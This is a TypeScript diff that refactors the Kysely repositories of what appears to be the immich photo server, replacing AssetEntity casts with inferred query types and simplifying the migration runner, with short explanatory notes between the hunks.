-  async getNotShared(ownerId: string): Promise<AlbumEntity[]> {
+  async getNotShared(ownerId: string) {
     return this.db
       .selectFrom('albums')
       .selectAll('albums')
@@ -203,7 +205,7 @@ export class AlbumRepository {
       )
       .select(withOwner)
       .orderBy('albums.createdAt', 'desc')
-      .execute() as unknown as Promise<AlbumEntity[]>;
+      .execute();
   }
 
   async restoreAll(userId: string): Promise<void> {
@@ -262,7 +264,7 @@ export class AlbumRepository {
     await this.addAssets(this.db, albumId, assetIds);
   }
 
-  create(album: Insertable<Albums>, assetIds: string[], albumUsers: AlbumUserCreateDto[]): Promise<AlbumEntity> {
+  create(album: Insertable<Albums>, assetIds: string[], albumUsers: AlbumUserCreateDto[]) {
     return this.db.transaction().execute(async (tx) => {
       const newAlbum = await tx.insertInto('albums').values(album).returning('albums.id').executeTakeFirst();
 
@@ -290,11 +292,12 @@ export class AlbumRepository {
         .select(withOwner)
         .select(withAssets)
         .select(withAlbumUsers)
-        .executeTakeFirst() as unknown as Promise<AlbumEntity>;
+        .$narrowType<{ assets: NotNull }>()
+        .executeTakeFirstOrThrow();
     });
   }
 
-  update(id: string, album: Updateable<Albums>): Promise<AlbumEntity> {
+  update(id: string, album: Updateable<Albums>) {
     return this.db
       .updateTable('albums')
       .set(album)
@@ -303,7 +306,7 @@ export class AlbumRepository {
       .returning(withOwner)
       .returning(withSharedLink)
       .returning(withAlbumUsers)
-      .executeTakeFirst() as unknown as Promise<AlbumEntity>;
+      .executeTakeFirstOrThrow();
   }
 
   async delete(id: string): Promise<void> {
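The shape of this change, repeated across the repository: instead of casting results to AlbumEntity with "as unknown as", the query itself carries the type. jsonObjectFrom is nullable by default, so $notNull() narrows it where a matching row is guaranteed, and executeTakeFirstOrThrow replaces a cast plus a possibly-undefined result. A minimal sketch with an assumed two-table schema (not the real immich one):

import { Kysely } from 'kysely';
import { jsonObjectFrom } from 'kysely/helpers/postgres';

// Assumed schema, for illustration only.
interface DB {
  albums: { id: string; ownerId: string; albumName: string };
  users: { id: string; name: string };
}

function getAlbumWithOwner(db: Kysely<DB>, id: string) {
  return db
    .selectFrom('albums')
    .selectAll('albums')
    .select((eb) =>
      jsonObjectFrom(eb.selectFrom('users').selectAll('users').whereRef('users.id', '=', 'albums.ownerId'))
        .$notNull() // every album has an owner, so drop `| null` from the inferred type
        .as('owner'),
    )
    .where('albums.id', '=', id)
    .executeTakeFirstOrThrow(); // result type includes owner; no cast needed
}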
@@ -5,10 +5,9 @@ import { InjectKysely } from 'nestjs-kysely';
 import { columns } from 'src/database';
 import { DB } from 'src/db';
 import { DummyValue, GenerateSql } from 'src/decorators';
-import { withExifInner, withFaces, withFiles } from 'src/entities/asset.entity';
 import { AssetFileType } from 'src/enum';
 import { StorageAsset } from 'src/types';
-import { asUuid } from 'src/utils/database';
+import { anyUuid, asUuid, withExifInner, withFaces, withFiles } from 'src/utils/database';
 
 @Injectable()
 export class AssetJobRepository {
@@ -149,6 +148,21 @@ export class AssetJobRepository {
       .executeTakeFirst();
   }
 
+  getForSyncAssets(ids: string[]) {
+    return this.db
+      .selectFrom('assets')
+      .select([
+        'assets.id',
+        'assets.isOffline',
+        'assets.libraryId',
+        'assets.originalPath',
+        'assets.status',
+        'assets.fileModifiedAt',
+      ])
+      .where('assets.id', '=', anyUuid(ids))
+      .execute();
+  }
+
   private storageTemplateAssetQuery() {
     return this.db
       .selectFrom('assets')
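anyUuid, now imported from src/utils/database, binds the whole id array as a single parameter. A sketch of what such a helper can look like (the real signature may differ):

import { sql } from 'kysely';

// Builds the right-hand side of `where "id" = any($1::uuid[])`, so a thousand
// ids become one bind parameter instead of a thousand-element IN list.
const anyUuid = (ids: string[]) => sql<string>`any(${`{${ids.join(',')}}`}::uuid[])`;

// usage: .where('assets.id', '=', anyUuid(ids))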
@@ -1,14 +1,21 @@
 import { Injectable } from '@nestjs/common';
-import { Insertable, Kysely, Selectable, UpdateResult, Updateable, sql } from 'kysely';
+import { Insertable, Kysely, NotNull, Selectable, UpdateResult, Updateable, sql } from 'kysely';
 import { isEmpty, isUndefined, omitBy } from 'lodash';
 import { InjectKysely } from 'nestjs-kysely';
+import { Stack } from 'src/database';
 import { AssetFiles, AssetJobStatus, Assets, DB, Exif } from 'src/db';
 import { Chunked, ChunkedArray, DummyValue, GenerateSql } from 'src/decorators';
+import { MapAsset } from 'src/dtos/asset-response.dto';
+import { AssetFileType, AssetOrder, AssetStatus, AssetType } from 'src/enum';
+import { AssetSearchOptions, SearchExploreItem, SearchExploreItemSet } from 'src/repositories/search.repository';
 import {
-  AssetEntity,
+  anyUuid,
+  asUuid,
   hasPeople,
+  removeUndefinedKeys,
   searchAssetBuilder,
   truncatedDate,
+  unnest,
   withExif,
   withFaces,
   withFacesAndPeople,
@@ -18,12 +25,9 @@ import {
   withSmartSearch,
   withTagId,
   withTags,
-} from 'src/entities/asset.entity';
-import { AssetFileType, AssetOrder, AssetStatus, AssetType } from 'src/enum';
-import { AssetSearchOptions, SearchExploreItem, SearchExploreItemSet } from 'src/repositories/search.repository';
-import { anyUuid, asUuid, removeUndefinedKeys, unnest } from 'src/utils/database';
+} from 'src/utils/database';
 import { globToSqlPattern } from 'src/utils/misc';
-import { Paginated, PaginationOptions, paginationHelper } from 'src/utils/pagination';
+import { PaginationOptions, paginationHelper } from 'src/utils/pagination';
 
 export type AssetStats = Record<AssetType, number>;
 
@@ -126,8 +130,6 @@ export interface AssetGetByChecksumOptions {
   libraryId?: string;
 }
 
-export type AssetPathEntity = Pick<AssetEntity, 'id' | 'originalPath' | 'isOffline'>;
-
 export interface GetByIdsRelations {
   exifInfo?: boolean;
   faces?: { person?: boolean; withDeleted?: boolean };
@@ -141,12 +143,12 @@ export interface GetByIdsRelations {
 
 export interface DuplicateGroup {
   duplicateId: string;
-  assets: AssetEntity[];
+  assets: MapAsset[];
 }
 
 export interface DayOfYearAssets {
   yearsAgo: number;
-  assets: AssetEntity[];
+  assets: MapAsset[];
 }
 
 @Injectable()
@@ -234,12 +236,12 @@ export class AssetRepository {
       .execute();
   }
 
-  create(asset: Insertable<Assets>): Promise<AssetEntity> {
-    return this.db.insertInto('assets').values(asset).returningAll().executeTakeFirst() as any as Promise<AssetEntity>;
+  create(asset: Insertable<Assets>) {
+    return this.db.insertInto('assets').values(asset).returningAll().executeTakeFirstOrThrow();
   }
 
-  createAll(assets: Insertable<Assets>[]): Promise<AssetEntity[]> {
-    return this.db.insertInto('assets').values(assets).returningAll().execute() as any as Promise<AssetEntity[]>;
+  createAll(assets: Insertable<Assets>[]) {
+    return this.db.insertInto('assets').values(assets).returningAll().execute();
   }
 
   @GenerateSql({ params: [DummyValue.UUID, { day: 1, month: 1 }] })
@@ -299,56 +301,13 @@ export class AssetRepository {
 
   @GenerateSql({ params: [[DummyValue.UUID]] })
   @ChunkedArray()
-  async getByIds(
-    ids: string[],
-    { exifInfo, faces, files, library, owner, smartSearch, stack, tags }: GetByIdsRelations = {},
-  ): Promise<AssetEntity[]> {
-    const res = await this.db
-      .selectFrom('assets')
-      .selectAll('assets')
-      .where('assets.id', '=', anyUuid(ids))
-      .$if(!!exifInfo, withExif)
-      .$if(!!faces, (qb) =>
-        qb.select((eb) =>
-          faces?.person ? withFacesAndPeople(eb, faces.withDeleted) : withFaces(eb, faces?.withDeleted),
-        ),
-      )
-      .$if(!!files, (qb) => qb.select(withFiles))
-      .$if(!!library, (qb) => qb.select(withLibrary))
-      .$if(!!owner, (qb) => qb.select(withOwner))
-      .$if(!!smartSearch, withSmartSearch)
-      .$if(!!stack, (qb) =>
-        qb
-          .leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
-          .$if(!stack!.assets, (qb) => qb.select((eb) => eb.fn.toJson(eb.table('asset_stack')).as('stack')))
-          .$if(!!stack!.assets, (qb) =>
-            qb
-              .leftJoinLateral(
-                (eb) =>
-                  eb
-                    .selectFrom('assets as stacked')
-                    .selectAll('asset_stack')
-                    .select((eb) => eb.fn('array_agg', [eb.table('stacked')]).as('assets'))
-                    .whereRef('stacked.stackId', '=', 'asset_stack.id')
-                    .whereRef('stacked.id', '!=', 'asset_stack.primaryAssetId')
-                    .where('stacked.deletedAt', 'is', null)
-                    .where('stacked.isArchived', '=', false)
-                    .groupBy('asset_stack.id')
-                    .as('stacked_assets'),
-                (join) => join.on('asset_stack.id', 'is not', null),
-              )
-              .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack')),
-          ),
-      )
-      .$if(!!tags, (qb) => qb.select(withTags))
-      .execute();
-
-    return res as any as AssetEntity[];
+  getByIds(ids: string[]) {
+    return this.db.selectFrom('assets').selectAll('assets').where('assets.id', '=', anyUuid(ids)).execute();
   }
 
   @GenerateSql({ params: [[DummyValue.UUID]] })
   @ChunkedArray()
-  getByIdsWithAllRelations(ids: string[]): Promise<AssetEntity[]> {
+  getByIdsWithAllRelationsButStacks(ids: string[]) {
     return this.db
       .selectFrom('assets')
       .selectAll('assets')
@@ -356,23 +315,8 @@ export class AssetRepository {
       .select(withTags)
       .$call(withExif)
       .leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
-      .leftJoinLateral(
-        (eb) =>
-          eb
-            .selectFrom('assets as stacked')
-            .selectAll('asset_stack')
-            .select((eb) => eb.fn('array_agg', [eb.table('stacked')]).as('assets'))
-            .whereRef('stacked.stackId', '=', 'asset_stack.id')
-            .whereRef('stacked.id', '!=', 'asset_stack.primaryAssetId')
-            .where('stacked.deletedAt', 'is', null)
-            .where('stacked.isArchived', '=', false)
-            .groupBy('asset_stack.id')
-            .as('stacked_assets'),
-        (join) => join.on('asset_stack.id', 'is not', null),
-      )
-      .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack'))
       .where('assets.id', '=', anyUuid(ids))
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [DummyValue.UUID] })
@@ -392,36 +336,29 @@ export class AssetRepository {
     return assets.map((asset) => asset.deviceAssetId);
   }
 
-  getByUserId(
-    pagination: PaginationOptions,
-    userId: string,
-    options: Omit<AssetSearchOptions, 'userIds'> = {},
-  ): Paginated<AssetEntity> {
+  getByUserId(pagination: PaginationOptions, userId: string, options: Omit<AssetSearchOptions, 'userIds'> = {}) {
     return this.getAll(pagination, { ...options, userIds: [userId] });
   }
 
   @GenerateSql({ params: [DummyValue.UUID, DummyValue.STRING] })
-  getByLibraryIdAndOriginalPath(libraryId: string, originalPath: string): Promise<AssetEntity | undefined> {
+  getByLibraryIdAndOriginalPath(libraryId: string, originalPath: string) {
     return this.db
       .selectFrom('assets')
      .selectAll('assets')
       .where('libraryId', '=', asUuid(libraryId))
       .where('originalPath', '=', originalPath)
       .limit(1)
-      .executeTakeFirst() as any as Promise<AssetEntity | undefined>;
+      .executeTakeFirst();
   }
 
-  async getAll(
-    pagination: PaginationOptions,
-    { orderDirection, ...options }: AssetSearchOptions = {},
-  ): Paginated<AssetEntity> {
+  async getAll(pagination: PaginationOptions, { orderDirection, ...options }: AssetSearchOptions = {}) {
     const builder = searchAssetBuilder(this.db, options)
       .select(withFiles)
       .orderBy('assets.createdAt', orderDirection ?? 'asc')
       .limit(pagination.take + 1)
       .offset(pagination.skip ?? 0);
     const items = await builder.execute();
-    return paginationHelper(items as any as AssetEntity[], pagination.take);
+    return paginationHelper(items, pagination.take);
   }
 
   /**
@@ -456,23 +393,22 @@ export class AssetRepository {
   }
 
   @GenerateSql({ params: [DummyValue.UUID] })
-  getById(
-    id: string,
-    { exifInfo, faces, files, library, owner, smartSearch, stack, tags }: GetByIdsRelations = {},
-  ): Promise<AssetEntity | undefined> {
+  getById(id: string, { exifInfo, faces, files, library, owner, smartSearch, stack, tags }: GetByIdsRelations = {}) {
     return this.db
       .selectFrom('assets')
       .selectAll('assets')
       .where('assets.id', '=', asUuid(id))
       .$if(!!exifInfo, withExif)
-      .$if(!!faces, (qb) => qb.select(faces?.person ? withFacesAndPeople : withFaces))
+      .$if(!!faces, (qb) => qb.select(faces?.person ? withFacesAndPeople : withFaces).$narrowType<{ faces: NotNull }>())
       .$if(!!library, (qb) => qb.select(withLibrary))
      .$if(!!owner, (qb) => qb.select(withOwner))
       .$if(!!smartSearch, withSmartSearch)
       .$if(!!stack, (qb) =>
         qb
           .leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
-          .$if(!stack!.assets, (qb) => qb.select((eb) => eb.fn.toJson(eb.table('asset_stack')).as('stack')))
+          .$if(!stack!.assets, (qb) =>
+            qb.select((eb) => eb.fn.toJson(eb.table('asset_stack')).$castTo<Stack | null>().as('stack')),
+          )
           .$if(!!stack!.assets, (qb) =>
             qb
               .leftJoinLateral(
@@ -489,13 +425,13 @@ export class AssetRepository {
                   .as('stacked_assets'),
                 (join) => join.on('asset_stack.id', 'is not', null),
              )
-              .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack')),
+              .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).$castTo<Stack | null>().as('stack')),
           ),
       )
      .$if(!!files, (qb) => qb.select(withFiles))
       .$if(!!tags, (qb) => qb.select(withTags))
       .limit(1)
-      .executeTakeFirst() as any as Promise<AssetEntity | undefined>;
+      .executeTakeFirst();
   }
 
   @GenerateSql({ params: [[DummyValue.UUID], { deviceId: DummyValue.STRING }] })
@@ -524,7 +460,7 @@ export class AssetRepository {
       .execute();
   }
 
-  async update(asset: Updateable<Assets> & { id: string }): Promise<AssetEntity> {
+  async update(asset: Updateable<Assets> & { id: string }) {
     const value = omitBy(asset, isUndefined);
     delete value.id;
     if (!isEmpty(value)) {
@@ -534,10 +470,10 @@ export class AssetRepository {
         .selectAll('assets')
         .$call(withExif)
         .$call((qb) => qb.select(withFacesAndPeople))
-        .executeTakeFirst() as Promise<AssetEntity>;
+        .executeTakeFirst();
     }
 
-    return this.getById(asset.id, { exifInfo: true, faces: { person: true } }) as Promise<AssetEntity>;
+    return this.getById(asset.id, { exifInfo: true, faces: { person: true } });
   }
 
   async remove(asset: { id: string }): Promise<void> {
@@ -545,7 +481,7 @@ export class AssetRepository {
   }
 
   @GenerateSql({ params: [{ ownerId: DummyValue.UUID, libraryId: DummyValue.UUID, checksum: DummyValue.BUFFER }] })
-  getByChecksum({ ownerId, libraryId, checksum }: AssetGetByChecksumOptions): Promise<AssetEntity | undefined> {
+  getByChecksum({ ownerId, libraryId, checksum }: AssetGetByChecksumOptions) {
     return this.db
       .selectFrom('assets')
       .selectAll('assets')
@@ -553,17 +489,17 @@ export class AssetRepository {
       .where('checksum', '=', checksum)
      .$call((qb) => (libraryId ? qb.where('libraryId', '=', asUuid(libraryId)) : qb.where('libraryId', 'is', null)))
       .limit(1)
-      .executeTakeFirst() as Promise<AssetEntity | undefined>;
+      .executeTakeFirst();
   }
 
   @GenerateSql({ params: [DummyValue.UUID, [DummyValue.BUFFER]] })
-  getByChecksums(userId: string, checksums: Buffer[]): Promise<AssetEntity[]> {
+  getByChecksums(userId: string, checksums: Buffer[]) {
     return this.db
       .selectFrom('assets')
      .select(['id', 'checksum', 'deletedAt'])
       .where('ownerId', '=', asUuid(userId))
       .where('checksum', 'in', checksums)
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [DummyValue.UUID, DummyValue.BUFFER] })
@@ -580,7 +516,7 @@ export class AssetRepository {
     return asset?.id;
   }
 
-  findLivePhotoMatch(options: LivePhotoSearchOptions): Promise<AssetEntity | undefined> {
+  findLivePhotoMatch(options: LivePhotoSearchOptions) {
     const { ownerId, otherAssetId, livePhotoCID, type } = options;
     return this.db
       .selectFrom('assets')
@@ -591,7 +527,7 @@ export class AssetRepository {
       .where('type', '=', type)
      .where('exif.livePhotoCID', '=', livePhotoCID)
       .limit(1)
-      .executeTakeFirst() as Promise<AssetEntity | undefined>;
+      .executeTakeFirst();
   }
 
   @GenerateSql(
@@ -600,7 +536,7 @@ export class AssetRepository {
       params: [DummyValue.PAGINATION, property],
     })),
   )
-  async getWithout(pagination: PaginationOptions, property: WithoutProperty): Paginated<AssetEntity> {
+  async getWithout(pagination: PaginationOptions, property: WithoutProperty) {
     const items = await this.db
       .selectFrom('assets')
       .selectAll('assets')
@@ -662,7 +598,7 @@ export class AssetRepository {
       .orderBy('createdAt')
       .execute();
 
-    return paginationHelper(items as any as AssetEntity[], pagination.take);
+    return paginationHelper(items, pagination.take);
   }
 
   getStatistics(ownerId: string, { isArchived, isFavorite, isTrashed }: AssetStatsOptions): Promise<AssetStats> {
@@ -681,7 +617,7 @@ export class AssetRepository {
       .executeTakeFirstOrThrow();
   }
 
-  getRandom(userIds: string[], take: number): Promise<AssetEntity[]> {
+  getRandom(userIds: string[], take: number) {
     return this.db
       .selectFrom('assets')
       .selectAll('assets')
@@ -691,7 +627,7 @@ export class AssetRepository {
      .where('deletedAt', 'is', null)
       .orderBy((eb) => eb.fn('random'))
       .limit(take)
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [{ size: TimeBucketSize.MONTH }] })
@@ -744,7 +680,7 @@ export class AssetRepository {
   }
 
   @GenerateSql({ params: [DummyValue.TIME_BUCKET, { size: TimeBucketSize.MONTH, withStacked: true }] })
-  async getTimeBucket(timeBucket: string, options: TimeBucketOptions): Promise<AssetEntity[]> {
+  async getTimeBucket(timeBucket: string, options: TimeBucketOptions) {
     return this.db
       .selectFrom('assets')
       .selectAll('assets')
@@ -777,7 +713,7 @@ export class AssetRepository {
                   .as('stacked_assets'),
                 (join) => join.on('asset_stack.id', 'is not', null),
               )
-              .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack')),
+              .select((eb) => eb.fn.toJson(eb.table('stacked_assets').$castTo<Stack | null>()).as('stack')),
       )
       .$if(!!options.assetType, (qb) => qb.where('assets.type', '=', options.assetType!))
      .$if(options.isDuplicate !== undefined, (qb) =>
@@ -789,11 +725,11 @@ export class AssetRepository {
       .where('assets.isVisible', '=', true)
       .where(truncatedDate(options.size), '=', timeBucket.replace(/^[+-]/, ''))
       .orderBy('assets.localDateTime', options.order ?? 'desc')
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [DummyValue.UUID] })
-  getDuplicates(userId: string): Promise<DuplicateGroup[]> {
+  getDuplicates(userId: string) {
     return (
       this.db
         .with('duplicates', (qb) =>
@@ -810,9 +746,15 @@ export class AssetRepository {
             (join) => join.onTrue(),
           )
          .select('assets.duplicateId')
-          .select((eb) => eb.fn('jsonb_agg', [eb.table('asset')]).as('assets'))
+          .select((eb) =>
+            eb
+              .fn('jsonb_agg', [eb.table('asset')])
+              .$castTo<MapAsset[]>()
+              .as('assets'),
+          )
          .where('assets.ownerId', '=', asUuid(userId))
          .where('assets.duplicateId', 'is not', null)
+          .$narrowType<{ duplicateId: NotNull }>()
          .where('assets.deletedAt', 'is', null)
          .where('assets.isVisible', '=', true)
          .where('assets.stackId', 'is', null)
@@ -837,7 +779,7 @@ export class AssetRepository {
        .where(({ not, exists }) =>
          not(exists((eb) => eb.selectFrom('unique').whereRef('unique.duplicateId', '=', 'duplicates.duplicateId'))),
        )
-        .execute() as any as Promise<DuplicateGroup[]>
+        .execute()
     );
   }
 
@@ -881,7 +823,7 @@ export class AssetRepository {
       },
     ],
   })
-  getAllForUserFullSync(options: AssetFullSyncOptions): Promise<AssetEntity[]> {
+  getAllForUserFullSync(options: AssetFullSyncOptions) {
    const { ownerId, lastId, updatedUntil, limit } = options;
    return this.db
      .selectFrom('assets')
@@ -899,18 +841,18 @@ export class AssetRepository {
            .as('stacked_assets'),
        (join) => join.on('asset_stack.id', 'is not', null),
      )
-      .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack'))
+      .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).$castTo<Stack | null>().as('stack'))
      .where('assets.ownerId', '=', asUuid(ownerId))
      .where('assets.isVisible', '=', true)
      .where('assets.updatedAt', '<=', updatedUntil)
      .$if(!!lastId, (qb) => qb.where('assets.id', '>', lastId!))
      .orderBy('assets.id')
      .limit(limit)
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [{ userIds: [DummyValue.UUID], updatedAfter: DummyValue.DATE, limit: 100 }] })
-  async getChangedDeltaSync(options: AssetDeltaSyncOptions): Promise<AssetEntity[]> {
+  async getChangedDeltaSync(options: AssetDeltaSyncOptions) {
    return this.db
      .selectFrom('assets')
      .selectAll('assets')
@@ -927,12 +869,12 @@ export class AssetRepository {
            .as('stacked_assets'),
        (join) => join.on('asset_stack.id', 'is not', null),
      )
-      .select((eb) => eb.fn.toJson(eb.table('stacked_assets')).as('stack'))
+      .select((eb) => eb.fn.toJson(eb.table('stacked_assets').$castTo<Stack | null>()).as('stack'))
      .where('assets.ownerId', '=', anyUuid(options.userIds))
      .where('assets.isVisible', '=', true)
      .where('assets.updatedAt', '>', options.updatedAfter)
      .limit(options.limit)
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   async upsertFile(file: Pick<Insertable<AssetFiles>, 'assetId' | 'path' | 'type'>): Promise<void> {
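eb.fn.toJson(...) produces an untyped JSON column, which is why the hunks above attach $castTo<Stack | null>() at each select site; $castTo changes only the static type, not the emitted SQL. A condensed sketch of the pattern with an assumed minimal schema:

import { Kysely } from 'kysely';

interface Stack {
  id: string;
  primaryAssetId: string;
}

// Assumed schema, for illustration only.
interface DB {
  assets: { id: string; stackId: string | null };
  asset_stack: Stack;
}

function getAssetWithStack(db: Kysely<DB>, id: string) {
  return db
    .selectFrom('assets')
    .selectAll('assets')
    .leftJoin('asset_stack', 'asset_stack.id', 'assets.stackId')
    // toJson serializes the joined row; $castTo pins its TypeScript type,
    // nullable because the left join may not match a row.
    .select((eb) => eb.fn.toJson(eb.table('asset_stack')).$castTo<Stack | null>().as('stack'))
    .where('assets.id', '=', id)
    .executeTakeFirst();
}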
@@ -2,7 +2,6 @@ import { Injectable } from '@nestjs/common';
 import AsyncLock from 'async-lock';
 import { FileMigrationProvider, Kysely, Migrator, sql, Transaction } from 'kysely';
 import { InjectKysely } from 'nestjs-kysely';
-import { existsSync } from 'node:fs';
 import { readdir } from 'node:fs/promises';
 import { join } from 'node:path';
 import semver from 'semver';
@@ -197,31 +196,23 @@ export class DatabaseRepository {
     return dimSize;
   }
 
-  async runMigrations(options?: { transaction?: 'all' | 'none' | 'each'; only?: 'kysely' | 'typeorm' }): Promise<void> {
+  async runMigrations(options?: { transaction?: 'all' | 'none' | 'each' }): Promise<void> {
     const { database } = this.configRepository.getEnv();
-    if (options?.only !== 'kysely') {
-      const dataSource = new DataSource(database.config.typeorm);
-
-      this.logger.log('Running migrations, this may take a while');
+    this.logger.log('Running migrations, this may take a while');
 
+    const tableExists = sql<{ result: string | null }>`select to_regclass('migrations') as "result"`;
+    const { rows } = await tableExists.execute(this.db);
+    const hasTypeOrmMigrations = !!rows[0]?.result;
+    if (hasTypeOrmMigrations) {
       this.logger.debug('Running typeorm migrations');
+      const dataSource = new DataSource(database.config.typeorm);
       await dataSource.initialize();
       await dataSource.runMigrations(options);
       await dataSource.destroy();
 
       this.logger.debug('Finished running typeorm migrations');
     }
 
-    if (options?.only !== 'typeorm') {
-      // eslint-disable-next-line unicorn/prefer-module
-      const migrationFolder = join(__dirname, '..', 'schema/migrations');
-
-      // TODO remove after we have at least one kysely migration
-      if (!existsSync(migrationFolder)) {
-        return;
-      }
-
     this.logger.debug('Running kysely migrations');
     const migrator = new Migrator({
       db: this.db,
@@ -230,7 +221,8 @@ export class DatabaseRepository {
       provider: new FileMigrationProvider({
         fs: { readdir },
         path: { join },
-        migrationFolder,
+        // eslint-disable-next-line unicorn/prefer-module
+        migrationFolder: join(__dirname, '..', 'schema/migrations'),
       }),
     });
 
@@ -253,7 +245,6 @@ export class DatabaseRepository {
 
     this.logger.debug('Finished running kysely migrations');
   }
-  }
 
   async withLock<R>(lock: DatabaseLock, callback: () => Promise<R>): Promise<R> {
     let res;
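runMigrations no longer takes an `only` switch; it decides for itself by probing the database for the legacy TypeORM `migrations` table. The probe is small enough to show standalone; this sketch (assuming nothing beyond Kysely itself) uses the same query as the diff:

import { Kysely, sql } from 'kysely';

// to_regclass() returns NULL when the named relation does not exist, so one
// cheap query says whether this database was ever migrated by TypeORM and
// the TypeORM runner still needs to be invoked before Kysely's Migrator.
async function hasTypeOrmMigrations(db: Kysely<unknown>): Promise<boolean> {
  const tableExists = sql<{ result: string | null }>`select to_regclass('migrations') as "result"`;
  const { rows } = await tableExists.execute(db);
  return !!rows[0]?.result;
}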
@@ -74,11 +74,21 @@ export class MyConsoleLogger extends ConsoleLogger {
 export class LoggingRepository {
   private logger: MyConsoleLogger;
 
-  constructor(@Inject(ClsService) cls: ClsService | undefined, configRepository: ConfigRepository) {
-    const { noColor } = configRepository.getEnv();
+  constructor(
+    @Inject(ClsService) cls: ClsService | undefined,
+    @Inject(ConfigRepository) configRepository: ConfigRepository | undefined,
+  ) {
+    let noColor = false;
+    if (configRepository) {
+      noColor = configRepository.getEnv().noColor;
+    }
     this.logger = new MyConsoleLogger(cls, { context: LoggingRepository.name, color: !noColor });
   }
 
+  static create() {
+    return new LoggingRepository(undefined, undefined);
+  }
+
   setAppName(name: string): void {
     appName = name.charAt(0).toUpperCase() + name.slice(1);
   }
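Both constructor parameters becoming optional is what makes the new `static create()` possible: the logger can now be built outside Nest's DI container, which the initial Kysely migration further down relies on. A reduced sketch of the shape (a hypothetical `AppLogger`, not the real class):

class AppLogger {
  private color: boolean;

  constructor(config?: { getEnv(): { noColor: boolean } }) {
    // When no config provider is available (e.g. a migration script rather
    // than the Nest container), fall back to a default instead of crashing.
    this.color = config ? !config.getEnv().noColor : true;
  }

  // Mirrors LoggingRepository.create(): a factory for non-DI call sites.
  static create(): AppLogger {
    return new AppLogger(undefined);
  }
}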
@@ -1,13 +1,12 @@
 import { Injectable } from '@nestjs/common';
-import { Kysely, OrderByDirection, sql } from 'kysely';
+import { Kysely, OrderByDirection, Selectable, sql } from 'kysely';
 import { InjectKysely } from 'nestjs-kysely';
 import { randomUUID } from 'node:crypto';
-import { DB } from 'src/db';
+import { DB, Exif } from 'src/db';
 import { DummyValue, GenerateSql } from 'src/decorators';
-import { AssetEntity, searchAssetBuilder } from 'src/entities/asset.entity';
+import { MapAsset } from 'src/dtos/asset-response.dto';
 import { AssetStatus, AssetType } from 'src/enum';
-import { anyUuid, asUuid } from 'src/utils/database';
-import { Paginated } from 'src/utils/pagination';
+import { anyUuid, asUuid, searchAssetBuilder } from 'src/utils/database';
 import { isValidInteger } from 'src/validation';
 
 export interface SearchResult<T> {
@@ -216,7 +215,7 @@ export class SearchRepository {
       },
     ],
   })
-  async searchMetadata(pagination: SearchPaginationOptions, options: AssetSearchOptions): Paginated<AssetEntity> {
+  async searchMetadata(pagination: SearchPaginationOptions, options: AssetSearchOptions) {
     const orderDirection = (options.orderDirection?.toLowerCase() || 'desc') as OrderByDirection;
     const items = await searchAssetBuilder(this.db, options)
       .orderBy('assets.fileCreatedAt', orderDirection)
@@ -225,7 +224,7 @@ export class SearchRepository {
       .execute();
     const hasNextPage = items.length > pagination.size;
     items.splice(pagination.size);
-    return { items: items as any as AssetEntity[], hasNextPage };
+    return { items, hasNextPage };
   }
 
   @GenerateSql({
@@ -240,7 +239,7 @@ export class SearchRepository {
       },
     ],
   })
-  async searchRandom(size: number, options: AssetSearchOptions): Promise<AssetEntity[]> {
+  async searchRandom(size: number, options: AssetSearchOptions) {
     const uuid = randomUUID();
     const builder = searchAssetBuilder(this.db, options);
     const lessThan = builder
@@ -251,8 +250,8 @@ export class SearchRepository {
       .where('assets.id', '>', uuid)
       .orderBy(sql`random()`)
       .limit(size);
-    const { rows } = await sql`${lessThan} union all ${greaterThan} limit ${size}`.execute(this.db);
-    return rows as any as AssetEntity[];
+    const { rows } = await sql<MapAsset>`${lessThan} union all ${greaterThan} limit ${size}`.execute(this.db);
+    return rows;
   }
 
   @GenerateSql({
@@ -268,17 +267,17 @@ export class SearchRepository {
       },
     ],
   })
-  async searchSmart(pagination: SearchPaginationOptions, options: SmartSearchOptions): Paginated<AssetEntity> {
+  async searchSmart(pagination: SearchPaginationOptions, options: SmartSearchOptions) {
     if (!isValidInteger(pagination.size, { min: 1, max: 1000 })) {
       throw new Error(`Invalid value for 'size': ${pagination.size}`);
     }
 
-    const items = (await searchAssetBuilder(this.db, options)
+    const items = await searchAssetBuilder(this.db, options)
       .innerJoin('smart_search', 'assets.id', 'smart_search.assetId')
       .orderBy(sql`smart_search.embedding <=> ${options.embedding}`)
       .limit(pagination.size + 1)
       .offset((pagination.page - 1) * pagination.size)
-      .execute()) as any as AssetEntity[];
+      .execute();
 
     const hasNextPage = items.length > pagination.size;
     items.splice(pagination.size);
@@ -392,7 +391,7 @@ export class SearchRepository {
   }
 
   @GenerateSql({ params: [[DummyValue.UUID]] })
-  getAssetsByCity(userIds: string[]): Promise<AssetEntity[]> {
+  getAssetsByCity(userIds: string[]) {
     return this.db
       .withRecursive('cte', (qb) => {
         const base = qb
@@ -434,9 +433,14 @@ export class SearchRepository {
       .innerJoin('exif', 'assets.id', 'exif.assetId')
       .innerJoin('cte', 'assets.id', 'cte.assetId')
       .selectAll('assets')
-      .select((eb) => eb.fn('to_jsonb', [eb.table('exif')]).as('exifInfo'))
+      .select((eb) =>
+        eb
+          .fn('to_jsonb', [eb.table('exif')])
+          .$castTo<Selectable<Exif>>()
+          .as('exifInfo'),
+      )
       .orderBy('exif.city')
-      .execute() as any as Promise<AssetEntity[]>;
+      .execute();
   }
 
   async upsert(assetId: string, embedding: string): Promise<void> {
